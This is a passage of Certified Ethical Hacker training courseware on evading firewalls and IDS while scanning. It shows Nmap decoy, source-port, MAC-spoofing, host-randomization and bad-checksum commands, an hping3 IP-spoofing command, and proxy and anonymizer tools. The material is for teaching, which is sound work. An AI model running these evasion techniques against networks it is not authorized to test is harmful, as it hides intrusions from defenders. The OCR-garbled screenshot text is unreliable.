Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

® Zenmap Scan

Tools

Target:

Profile

Help

| 10.10.1.11

Command:

Hosts

|nma

Services

OS 4 Host 10.10.1.11

Nmap Output Ports/Hosts Topology Host Details Scans

nmap -g 80 10.10.1.11

Details

Starting Nmap 7.82 ( http: /nmap.org ) at 2022-@3-16 00:41 Mami’) MmQUNge Time Nmap scan report for 10.10.1.11 Host is up (@.0@s latency). Not shown: 994 closed ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server MAC Address:

Filter Hosts

v

00

1D:@1:88:@@ (Microsoft)

Nmap done: 1 IP address (1 host up) scanned in 1.38 seconds

o

Figure 3.85: Scanning over Firewall using Zenmap

Module 03 Page 352

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

IP Address Decoy

CE H

@ IP address decoy technique refers to generating or manually specifying the IP addresses of decoysin order to evade an IDS or firewall @ Itappears to the target that the decoys as well as the host(s) are scanning the network ‘@

This technique makes it difficult for the IDS or firewall to determine which IP address was actually scanning the network and which IP addresses were decoys

Decoy Scanning using Nmap Nmap has two options for decoy scanning: @ nmap -D RND:10 [target] (Generatesa random number of decoys) @ nmap

-D decoyl1,decoy2,decoy3,..

etc.

(Manually specify the IP addresses of the decoys)

IP Address Decoy The IP address decoy technique refers to generating or manually specifying IP addresses of the decoys to evade IDS/firewalls. It appears to the target that the decoys as well as the host(s) are scanning the network. This technique makes it difficult for the IDS/firewall to determine which IP address is actually scanning the network and which IP addresses are decoys. The Nmap scanning tool comes with a built-in scan function called a decoy scan, which cloaks a scan with decoys. This technique generates multiple IP addresses to perform a scan, thus making it difficult for the target security mechanisms such as IDS, firewalls, etc., to identify the original source from the registered logs. The target IDS might report scanning from 5— 0 IP addresses; however, it cannot differentiate between the actual scanning IP address and the innocuous decoy IPs.

You can perform two types of decoy scans using Nmap: =

nmap -D RND:10 [target] Using this command, Nmap automatically generates a random number of decoys for the scan and randomly positions the real IP address between the decoy IPs. Ex. Assume that 10.10.10.10 is the target IP address to be scanned. Thus, the Nmap decoy scan command will be: #

nmap

Module 03 Page 353

-D

RND:

10

10.10.10.10

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

© Zenmap Scan Tools Profile Help Target:

-

10.10.1.11

vy)

Profile:

v|

o

x

|Scan) | Cancel

Command: | nmap -D RND: 10.10.1.11 Hosts | OS 4 Host @

Services

10.10.1.11

Nmap Output Ports /Hosts Topology Host Details Scans [nmap -D RND: 10.10.1.11 Starting f

Nmap

7.8@ ( https://nmap.org Time

)

at

v

2022-03-16

Details 02:37

Nmap scan report for 10.10.1.11 Host is up (@.0@s latency). Not shown: 994 closed ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server MAC Address: @0:15:5D:01:80:00 (Microsoft) Filter Hosts

Nmap done:

1 IP address

(1 host up) scanned in 1.52 seconds

Figure 3.86: Decoy using Nmap RND option

=

nmap -D decoy1,decoy2,decoy3,...,ME,... [target]

Using this command, you can manually specify the IP addresses of the decoys to scan the victim’s network. Here, you have to separate each decoy IP with a comma (,) and you can optionally use the ME command to position your real IP in the decoy list. If you place ME in the 4‘" position of the command, your real IP will be positioned at the 4'” position accordingly. This is an optional command, and if you do not mention ME in your scan command, then Nmap will automatically place your real IP in any random position. For example, assume that 10.10.1.19 is the real source IP and 10.10.1.11 is the target IP

address to be scanned. Then, the Nmap decoy command will be: Syntax:

# nmap -D 192.168.0.1,172.120.2.8,192.168.2.8,10.10.1.19,10.10.1.5 10.10.1.11

Module 03 Page 354

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

-

® Zenmap

Scan Tools Profile Target:

o

x

Help

v | Profile:

10.10.1.11

v

Cancel

Command:

Hosts OS

Services

4 Host

@

10.10.1.11

4

Nmap Output Ports /Hosts Topology Host Details Scans |nmap -D 192.168.0.1,172.120.2.8, 192.168.2.8, 10.10.1.19,10.10.1.5 1. |v

Details

Starting Nmap 7.80 ( https://nmap.org ) at 2022-@3-16 @2:49 fami) MEE Time Nmap scan report for 10.10.1.11 Host is up (@.00s latency). Not shown: 994 closed ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp

open

microsoft-ds

3389/tcp open ms-wbt-server MAC Address: @@:15:5D:@1:80:0@ (Microsoft) Filter Hosts

Nmap done:

1 IP address (1 host up) scanned in 1.80 seconds

Figure 3.87: Decoy using Nmap with manual decoy list

These decoys can be generated in both initial ping scans such as ICMP, SYN, ACK, etc., and during the actual port scanning phase. IP address decoy is a useful technique for hiding your IP address. However, it will not be successful if the target employs active mechanisms such as router path tracing, response dropping, etc. Moreover, using many decoys can slow down the scanning process and affect the accuracy of the scan.

Module 03 Page 355

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

IP Address Spoofing

CE H

@ IP spoofing refers to changing the source IP addressesso that the attack appears to be coming from someone else @ When the victim repliesto the address, it goes back to the spoofed address rather than the attacker's real address |@ Attackers modifythe address information in theIP packet header and the source address bits field in orderto bypass the IDS or firewall IP spoofing using Hping3: Hping3 www. certifiedhacker.com -a 7.7.7.7 Attacker sending a packet with a spoofed address 7.7.7.7

IP Address Spoofing Most firewalls filter packets based on the source IP address. These firewalls examine the source IP address and determine whether the packet is coming from a legitimate source or an illegitimate source. The IDS filters packets from illegitimate sources. Attackers use IP spoofing technique to bypass such IDS/firewalls. IP address spoofing is a hijacking technique in which an attacker obtains a computer’s IP address, alters the packet headers, and sends request packets to a target machine, pretending to be a legitimate host. The packets appear to be sent from a legitimate machine but are actually sent from the attacker’s machine, while his/her machine's IP address is concealed. When the victim replies to the address, it goes back to the spoofed address and not to the attacker’s real address. Attackers mostly use IP address spoofing to perform DoS attacks. When the attacker sends a connection request to the target host, the target host replies to the spoofed IP address. When spoofing a nonexistent address, the target replies to a nonexistent system and then hangs until the session times out, thus consuming a significant amount of its

own resources.

Module 03 Page 356

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

Hping3 www.certifiedhacker.com

‘¢

IP spoofing using Hping3:

-a 7.7.7.7

Attacker sending a packet with a spoofed address 7.7.7.7 Victim IP address 5.5.5.5 Real address VDT Figure 3.88: IP Spoofing using Hping3

IP spoofing using Hping3: Hping3

www.certifiedhacker.com

-a

7.7.7.7

You can use Hping3 to perform IP spoofing. The above command TCP/IP packets to network hosts.

helps you to send arbitrary

Note: You will not be able to complete the three-way handshake and open a successful TCP connection with spoofed IP addresses.

Module 03 Page 357

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

MAC Address Spoofing |@ The MAC address spoofing technique involves spoofing a MAC address with the MAC address of a legitimate user on the network.

@ Attackers use the --spoof-mac Nmap option to set a specific MAC address for the packets to evade firewalls.

Al RightsReserved. Reproduction

MAC Address Spoofing Network firewalls filter packets based on the source media access control (MAC) address. They examine the MAC address in the packet header and determine whether the packets originate from a legitimate source. Firewalls allow traffic from specific sources using MAC filtering rules and restrict packets that do not satisfy the filtering rules. To avoid these restrictions, attackers use MAC spoofing techniques, in which they employ fake MAC addresses and masquerade as legitimate users to scan the hosts located behind the firewall. The MAC address spoofing technique allows attackers to send request packets to the target machine/network, pretending to be a legitimate host. Attackers use the Nmap tool to evade firewalls via MAC address spoofing. Performing MAC Address Spoofing to Scan Beyond IDS and Firewall Using Nmap: Attackers use the --spoof-mac Nmap option to choose or set a specific MAC address for packets and send them to the target system/network. =

nmap

-sT

-Pn

--spoof-mac

0

[Target

IP]

The above command automatically generates a random MAC address and attaches it to the packets in place of the original MAC address while performing host scanning. Here, -spoof-mac 0 represents the randomization of the MAC address.

Module 03 Page 358

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

oof-mac

0 10.10.1.11

-

rot Terminal

ffnmap -sT -Pn --spoof-mac 0 10.10.1.11 Starting Nmap 7.92 _( https://nmap.org ) at 2022-03-16 02:56 EDT Bpooting MAC address DF:FB:47:17:14:72 (No registered vendor) You have specified some options that require raw socket access. These options will not be honored for TCP Connect scan. Nmap scan report for 10.10.1.11 Host is up (0.039s latency). Not_shown:

994

closed

PORT 21/tcp

STATE open

SERVICE ftp

135/tcp

open

msrpc

80/tcp

open open open

3389/tcp

Nmap done:

open

tcp

ports

(conn-refused)

http

netbios-ssn

microsoft-ds

ms-wbt-server

1 IP address me @parrot

(1 host up) .

scanned

in 0.57 seconds

Figure 3.89: Screenshot of scanning using the Nmap -spoof-mac 0 option =

nmap

-sT

-Pn

--spoof-mac

[Vendor]

[Target

IP]

The above command allows attackers to opt for a MAC address from the vendor and spoof it by attaching it to the packets in place of the original MAC address during the scan. This type of scan allows attackers to scan in the hidden mode, as the original MAC address is not recorded in the firewall logs. --spoof-mac [vendor] represents the randomization of the MAC address based on the specified vendor.

File

Edit

View

@parrot

#nmap

Starting Spoofing

You

These

Nmap Host

-sT

Search

Termin

-Pn

poof-mac

Help

e

specified

options

will

some not

options

be

honored

scan report for 10.10.1.11 is up (@.044s latency).

INot_shown:

994

STATE

open open open open open B389/tcp open

Nmap done:

Dell

10.10.1.11|

Nmap 7.92 (_https://nmap.org MAC address 00:00:97:82:FE:32

have

closed

SERVICE

tcp

- Parrot Termina

10.10.1.11

poof-mac Dell

nmap

ee

ports

that

for

)

at _ 2022-03-16 (Dell EMC)

require TCP

raw

Connect

02:58

socket scan.

EDT

access.

(conn-refused)

ftp http msrpc netbios-ssn microsoft-ds _ms-wbt-server

1 IP address rot

(1 host up) scanned

in 0.58 seconds

Figure 3.90: Scanning using the Nmap —spoof-mac [Vendor] option Module 03 Page 359

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Scanning Networks =

nmap

-sT

-Pn

Exam 312-50 Certified Ethical Hacker

--spoof-mac

[new

MAC]

[Target

IP]

The above command allows attackers to manually choose or set a new MAC address for the packets sent during the scanning process. --spoof-mac [new MAC] represents manually setting the MAC address.

Figure 3.91: Scanning using the Nmap —spoof-mac [new MAC] option

Module 03 Page 360

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

Creating Custom Packets

CEH

Creating Custom Packets by using Packet Crafting Tools \@ Attackers create custom TCP packets using various packet crafting tools like Colasoft Packet Builder, NetScanTools Pro, etc. to

scan a target beyonda

firewall

Copyright © by

Al Rights

‘ete //uww.colasof.com Reserved. Reproduction is Strictly Prohibited

Creating Custom Packets The attacker creates and sends custom packets to scan the IDS/firewalls. Various techniques are used to create custom mentioned below: =

intended target beyond packets. Some of them

the are

Creating Custom Packets by using Packet Crafting Tools Attackers create custom TCP packets to scan the target by bypassing the firewalls. Attackers use various packet crafting tools such as Colasoft packet builder (https://www.colasoft.com), NetScanTools Pro (https://www.netscantools.com), etc., to scan the target that is beyond the firewall. Packet crafting tools craft and send packet streams (custom packets) using different protocols at different transfer rates.

o

Colasoft Packet Builder Source: https://www.colasoft.com Colasoft Packet Builder is a tool that allows an attacker to create custom network packets and helps security professionals assess the network. The attacker can select aTCP packet from the provided templates and change the parameters in the decoder, hexadecimal, or ASCII editor to create a packet. In addition to building packets, Colasoft Packet Builder supports saving packets to packet files and sending packets to the network.

Module 03 Page 361

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

@ Colasoft Packet Builder

Bile Edit Send Help

x @\¢¢\o @ Exports Import | Add. Insert Copy Paste Dulte (Decode Editor Sy Packet Info eooeei ee

@ Sender Ip Acre WP rereet @ Terset Ip ai 2 Extra Dai

w/e 2 Adapter €¢i)eSend Send/AI| Checksum | About PacketNo. 1 (IPGL

eo @.100000000 Second FFF :FRIPRSFFSFF 20:00:00:20:00:0@ (5/9) exeos [ets 1 exe0e 6 1 aia 20:00:00:00:00:00 @.0.0.0 [25/4] 00:00:00:00:00:00 2.0.0.0. [38 38 bytes 142 exeFECI760

No.

Delta Time

Source

Packets | 1 | Selected | 1 Destination

RR] Da FFA 100200 OB O000000

Figure 3.92: Screenshot of Colasoft Packet Builder

There are three views in the Packet Builder: Packet List, Decode Editor, and Hex Editor. e

Packet List displays all the constructed packets. When you select one or more packets in Packet List, the first highlighted packet is displayed in both Decode Editor and Hex Editor for editing.

e

In Hex Editor, the data of the packet are represented as hexadecimal values and ASCII characters; nonprintable characters are represented by a dot (".") in the ASCII section. You can edit either the hexadecimal values or the ASCII characters.

e

Decode Editor allows the attacker to edit packets without remembering the value length, byte order, and offsets. You can select a field and change the value in the

edit box.

For creating a packet, you can use the add or insert packet command in the Edit menu or the Toolbar to create a new packet. The attacker can send a constructed packet to wire directly and control how Colasoft Packet Builder sends the packets, specifying, for example, the interval between packets, loop times, and delay between loops. This packet builder audits networks and checks the network protection against attacks and intruders. Attackers may use this packet builder to create fragmented packets to bypass network firewalls and IDS systems. They can also create packets and flood the victim with a very large number of packets, which could result in DoS attacks. Module 03 Page 362

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

Randomizing Host Order and Sending Bad Checksums Randomizing Host Order

Sending Bad Checksums

@ Attackers scan the number of hosts in the target

@ Attackers send packets with bad or bogus

network in random order to scan an intended target that is behind a firewall

= Zenap Scan Took Pofie Help Yager [1030.1

D] roe:

a

TCP/UPD checksums to the intended target to avoid certain firewall rulesets

x

>] ka]

Serves | Nmap Output Pons/ Host Topology Host Deas Scans 05 « Host [map ~andomize-hrs 1230331 =] F [Deie = rao.

C | EH

Starting tmap 7.80 ( nttps://nmap.ore ) at 2022-03-16

> Zenmap Seen Took Bolle Help Yager [103031

D] roe:

o

x

>] Ea]

Serves | Nmap Output Pons/ Host: Topology Host Deas Scans 05 + test [ap bade 01081 Z] & [Detie = rao.

Nesp done: 1 IP sddress (1 host up) scanned in 23.00 (Serosort)

Fite Hoss

(2 host up) > scanned in 1.36

Fier Hoss

ttps:/famep.org A igh

Randomizing Host Order and Sending Bad Checksums Randomizing Host Order The attacker scans the number of hosts in the target network in a random order to scan the intended target that is lying beyond the firewall. The option used by Nmap to scan with a random host order is --randomize-hosts. This technique instructs Nmap to shuffle each group of 16384 hosts before scanning with slow timing options, thus making the scan less notable to network monitoring systems and firewalls. If larger group sizes are randomized, the PING_GROUP_Sz should be increased in nmap.h and it should be compiled again. Another method can be followed by generating the target IP list with the list scan command -sL -n -oN and then randomizing it with a Perl script and providing the whole list to Nmap using the -iL command.

Module 03 Page 363

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

© Zenmap Scan Tools Profile Help Target: | 10.10.1.11

Commane

Hosts || Services OS ¢ Host =

v)

Profile:

v|

a |Scan)

Nmap Output Ports /Hosts Topology Host Details Scans nmap --randomize-hosts 10.10.1.11 v

10.10.1.11

Starting Nmap 05:34 MUL.

7.88 ( ouyelge

https://nmap.org Time

) at

x [Cancel

Details

2022-03-16

Nmap scan report for 10.10.1.11 Host is up (@.@@s latency).

Not shown: 994 PORT STATE

21/tcp 80/tcp

open open

135/tcp 139/tcp 445/tcp 3389/tcp

open open open open

MAC Address:

closed ports SERVICE

ftp http

msrpc netbios-ssn microsoft-ds ms-wbt-server

@8:15:5D:@1:80:@@

(Microsoft)

Nmap done: 1 IP address (1 host up) scanned in 1.36

Filter Hosts

v

.

Figure 3.93: Screenshot of randomizing hosts in Zenmap

Sending Bad Checksums The attacker sends packets with bad or bogus TCP/UPD checksums to the intended target to avoid certain firewall rule sets. TCP/UPD checksums are used to ensure data integrity. Sending packets with incorrect checksums can help attackers to acquire information from improperly configured systems by checking for any response. If there is a response, then it is from the IDS or firewall, which did not verify the obtained checksum. If there is no response or the packets are dropped, then it can be inferred that the system is configured. This technique instructs Nmap to send packets with invalid TCP, UDP, or SCTP checksums to the target host. The option used by Nmap is --badsum.

© Zenmap Scan Tools Profile Help Target: 10.10.1.11

v|

Profile:

v|

o

x

[Scan] | Cencel

Command: | nmap --badsum 10.10.1.11 Hosts || Services OS 4 Host 10.10.11

4

Nmap Output Ports / Hosts Topology Host Details Scans Details v nmap --badsum 10.10.1.11 Starting Nmap 7.80 ( https://nmap.org ) at 2022-03-16 05:39 DML. MOY_DQME Time Nmap scan report for 10.10.1.11 Host is up (@.@@s latency).

All 10@@ scanned ports on 10.10.1.11 are filtered MAC Address: 0@:15:50:01:80:00 (Microsoft) Nmap done: 1 IP address seconds

(1 host up) scanned in 23.00

Figure 3.94: Screenshot of scanning by sending bad checksums in Zenmap

Module 03 Page 364

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

Proxy Servers

CE H

A proxy server is an application that can serve as an intermediary for connecting with other computers (1)

To hide the actual source of a scan and evade certain IDS/firewall restrictions

(2) To mask the actual source of an attack by impersonating the fake source address of the proxy Why Attackers

Use Proxy

(3) To remotely access intranets and other website resources that are normally restricted

Servers?

To interruptall requests sentby a user and transmit them to a third destination such that victims can only identify the proxy server address

e

To chain multiple proxy servers to avoid detection

Note: A search in Google will list thousands of free proxy servers Proxy Servers A proxy server is an application that can serve as an intermediary for connecting with other

computers.

A proxy server is used: =

Asa

firewall and to protect the local network from external attacks.

=

As an IP address multiplexer that allows several computers to connect to the Internet when you have only one IP address (NAT/PAT).

=

To anonymize web surfing (to some extent).

=

To extract unwanted proxy servers).

=

To provide some protection against hacking attacks.

=

To save bandwidth.

content, such as ads or “unsuitable” material (using specialized

How does a proxy server work? Initially, when you use a proxy to request a particular web page on an actual server, the proxy server receives it. The proxy server then sends your request to the actual server on your behalf. It mediates between you and the actual server to transmit and respond to the request, as shown in the figure below.

Module 03 Page 365

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Scanning Networks

Proxy Server

*..

Target Organization



Attacker

Figure 3.95: Attacker using a proxy server for connecting to the target

In this process, the proxy receives the communication between the client and the destination application. To take advantage of a proxy server, an attacker must configure client programs so that they can send their requests to the proxy server instead of the final destination. Why Attackers Use Proxy Servers? It is easier for an attacker to attack or hack a particular system than to conceal the attack source. Therefore, the primary challenge for an attacker is to hide his/her identity so that he/she cannot be traced. Thus, the attacker uses a proxy server to avoid attack detection by masking his/her IP address. When the attacker uses a proxy to connect to the target system, the server logs will record the proxy's source address rather than the attacker’s source address. Proxy sites help the attacker to browse the Internet anonymously and access blocked sites (i.e., evade firewall restrictions). Thus, the attacker can surf restricted sites anonymously without using the source IP address. Attackers use proxy servers: =

To hide the actual source of a scan and evade certain IDS/firewall restrictions.

=

To hide the source IP address so that they can hack without any legal corollary.

=

To mask the actual source of the attack by employing a fake source address of the proxy.

=

To remotely access intranets and other website resources that are normally off limits.

=

To interrupt all the requests sent by a user and transmit them to a third destination; hence, victims will only be able to identify the proxy server address.

=

To chain multiple proxy servers to avoid detection.

Module 03 Page 366

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

Free Proxy Servers

Some free proxy servers available on the Internet, which can help you to access restricted sites without revealing your IP address. In the Google search engine, type “Free Proxy Servers" to see a list of such servers. Select one from this list and download and install it to browse anonymously without revealing your legitimate IP address. vy

G free proxy servers - Google Sear Xe

©

1

& goosle.com/search?q=free+ proxy +servers&iog= free proxyservesBiaqs=chrome.6515701512195325,.

Be QAll

@)Videos

Q

=

@

@

t

&

& (2)

x 4a BNews

images

© Shopping:

More

‘About 86,500,000 results (0.81 seconds)

8 Browsing i Servers in 2022

bttps:/ivpnoverview.com >...» Anot A List of Free Proxy

FreeProxy

(Individual Proxies)

‘Software

‘Are you looking fora free proxy server in 2022? Check out our list of free proxy servers to improve your privacy and freedom online! What is a proxy server?

Why would | use a proxy? https:lispys.one > Proxy list, free proxy servers list online, hide your IP address . . Free proxy list Http, ssl, socks proxy servers for free. Fresh public proxy servers lists to unblock your intemet. Realtime updated live proxies. Free proxy list - US United States » Proxy list by country HTTP proxy list https:ligeonode.com > free-proxy-list Free Proxy List P Port County ORG &ASN Protocol An. 190.71.97.115 5678 COCO EPM Telecomunicaciones SA E.S.P (ASB... socks4 elite 143.249.1168 8888 USUS — Zenlayer Inc (AS21859) socks4 elite 218.64.1293 5678 CNCN NIA(AS4134) socks4 elite View 47 more rows

FreeProxy, which runs on Microsoft Windows platforms, was originally developed in 1999 as a ‘method of intemet connection sharing. Since that time ithas been continuously developed and now offers a ‘number of internet services. The software is free but not available under the GNU General Public License Wikipedia Developer(s): Hand-Crafted Software License: Freeware People also search for d W

Privoxy

HI

—_hide.me VPN

¢

. )

NordVPN Feedback

Figure 3.96: Free Proxy Servers

Module 03 Page 367

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

Proxy Chaining

|

| @

User requestsa resource from the destination

| ©

Proxy client at the user’s system connects to a proxy server and passes the request to proxy server

|} ©

the proxy server strips the user's identification information and passes the request to next proxy server

| @

this processis repeated by all the proxy servers in the chain

| ©

Atthe end, the unencrypted request is passed to the web server

» a User

|

1: 20.10.10.2, Port: 8012

1: 10.10.20.5, Port: 8023

1: 20.10.54 Port: 8030

Port: 8054

Port: 8035

Port: 8028

Proxy Chaining Proxy chaining helps an attacker to increase his/her Internet anonymity. Internet anonymity depends on the number of proxies used for fetching the target application; the larger the number

of proxy servers used, the greater is the attacker’s anonymity. The proxy chaining process is described below:

=

The user requests a resource from the destination.

=

A proxy client in the user’s system connects to a proxy server and passes the request to the proxy server.

=

The proxy server strips the user’s identification information and passes the request to the next proxy server.

=

This process is repeated by all the proxy servers in the chain.

=

Finally, the unencrypted request is passed to the web server.

User

IP: 20.10.10.2 Port: 8012

cs IP: 20.15.15.3 Port: 8054

IP: 10.10.20.5 Port: 8023

Encrypted/unencrypted traffic

Bs

IP: 15.20.15.2 Port: 8045

Bh pepe By

1: 10.20.10.8 Port: 8028

traffic

a) Web Server

Figure 3.97: Proxy Chaining

Module 03 Page 368

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

Proxy Tools Proxy Switcher

CE H

Proxy Switcher allows you to surf

|

anonymously on the Internet without disclosing your IP address Bava saa

7s

CyberGhost VPN hides your IP and

| CyberGhost | replacesit with one of your choice, thus | | veN allowing you to surf anonymously |

_—

x

|

Al servers

.

CyberGhostVPN

@

coe

] Other Proxy Tools:

Burp Suite

es/tewmeperswigernet

>

o

>

6

>

@

,

.

Ts wn rw che om Tor

e

——_—‘tps/wmtargoieccorg

ccProxy

——_‘tps//meyungzsofet

res fn eros com

Hotspot Shield

ti:

tsps com

|

Proxy Tools Proxy tools are intended to allow users to surf the Internet anonymously by keeping their IP hidden through a chain of SOCKS or HTTP proxies. These tools can also act as HTTP, mail, FTP, SOCKS, news, telnet, and HTTPS proxy servers.

Module 03 Page 369

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

Proxy Switcher Source: https://www.proxyswitcher.com

Proxy Switcher allows attackers to surf the Internet anonymously without disclosing their IP address. It also helps attackers to access various blocked sites in the organization. In addition, it avoids all sorts of limitations imposed by target sites. [Bi Proxy Switcher Unregistered (Direct Connection )

File Edit Actions View Help

7 Ex

GOS EE7 Server

5\ 9." State

Figure 3.98: Screenshot of Proxy Switcher

Module 03 Page 370

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

=

Exam 312-50 Certified Ethical Hacker

CyberGhost VPN Source: https://www.cyberghostvpn.com CyberGhost VPN hides the attacker's IP and replaces it with a selected IP, allowing him or her to surf anonymously and access blocked or censored content. It encrypts the connection and does not keep logs, thus securing data. All servers Name

Distance

Load

CyberGhost VPN

Favorite

‘Albania

> we

>

‘Ss

Argentina

Figure 3.99: Screenshot of CyberGhost

In addition to the proxy tools mentioned above, there are many other proxy tools intended to allow users to surf the Internet anonymously. Some additional proxy tools are listed below:

=

Burp Suite (https://www.portswigger.net)

=

Tor (https://www.torproject.org)

=

CCProxy (https://www.youngzsoft.net)

=

Hotspot Shield (https://www.hotspotshield.com)

Module 03 Page 371

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

Proxy Tools for Mobile =

Shadowsocks Source: https://shadowsocks.org Shadowsocks is a high-performance, cross-platform secured socks5 proxy. It adopts bleeding-edge techniques with asynchronous I/O and event-driven programming. This tool is available on multiple platforms, including PC, MAC, mobile devices (Android and iOS), and routers (OpenWRT). It is a low-resource-consumption tool that is suitable for low-end boxes and embedded devices. It supports open-source implementations in python, node.js, golang, C#, and pure C. Shadowsocks help attackers to surf the Internet privately and securely. can't Fd & 06:00

shadowsocks

&

Global Settings Profiles Switchto another profile or add new profiles Network Traffic Internet Sent: Receive

le. (latency: 1841ms)

Server Settings Profile Name Placeholder Server example.com Remote Port £8388 (port number of the remot Local Port 1080 (port number of the local server) Password

Figure 3.100: Screenshot of Shadowsocks

Some additional proxy tools for mobile are listed below:

=

ProxyDroid (https://github.com)

=

Proxy Manager (https://play.google.com)

=

CyberGhost VPN (https://www.cyberghostvpn.com)

=

Servers Ultimate (https://icecoldapps.com)

Module 03 Page 372

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

Anonymizers @ Ananonymizer removes all identity information from the user’s computer while the user surfs the Internet @ Anonymizers make activity on the Internet untraceable

CE H Whonix

Whonixis a desktop operatingsystem | designed for advanced securityand privacy

@ Anonymizers allow you to bypass Internet censors Why use an Anonymizer? @

Privacy and anonymity

©

Protection against online attacks

©

Access restricted content

@

Bypass IDS and Firewall rules

"tas Jor won

Anonymizers An anonymiczer is an intermediate server placed between an end user and a website that accesses the website on their behalf and makes web surfing activities untraceable. Anonymizers allow users to bypass Internet censorship. An anonymizer eliminates all identifying information (IP address) from the system while surfing the Internet, thereby ensuring privacy. It encrypts the data transferred from a computer to the Internet service provider (ISP). Most anonymizers can anonymize web (HTTP:), File Transfer Protocol (FTP:), and gopher (gopher:) Internet services. To visit a page anonymously, you can visit your preferred anonymizer site and enter the name of the target website in the anonymization field. Alternatively, you can set your browser home page to point to an anonymizer to anonymize subsequent web access. In addition, you can choose to anonymously provide passwords and other information to sites without revealing any additional information, such as your IP address. Attackers may configure an anonymizer as a permanent proxy server by making the site name the setting for the HTTP, FTP, Gopher, and other proxy options in their application configuration menu, thereby cloaking their malicious activities.

Why Use an Anonymizer? The reasons for using anonymizers include: =

Ensuring privacy: Protect your identity by making your web navigation activities untraceable. Your privacy is maintained until and unless you disclose your personal information on the web, for example, by filling out forms.

=

Accessing government-restricted content: Most governments prevent their citizens from accessing certain websites or content deemed inappropriate or sensitive. However, these sites can still be accessed using an anonymizer located outside the target country.

Module 03 Page 373

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks =

Exam 312-50 Certified Ethical Hacker

Protection against online attacks: An anonymizer can protect you from all instances of online pharming attacks by routing all customer Internet traffic via its protected DNS

server. =

Bypassing IDS and firewall rules: Firewalls are typically bypassed by employees or students accessing websites that they are not supposed to access. An anonymizer service gets around your organization’s firewall by setting up a connection between your computer and the anonymizer service. Thus, firewalls see only the connection from your computer to the anonymizer’s web address. The anonymizer will subsequently connect to any website (e.g., Twitter) with the help of an Internet connection and then direct the content back to you. To your organization, your system appears to be simply connected to the anonymizer’s web address but not to the actual site that you are browsing.

In addition to protecting users' identities, anonymizers can also be used to attack a website without being traced. Types of Anonymizers

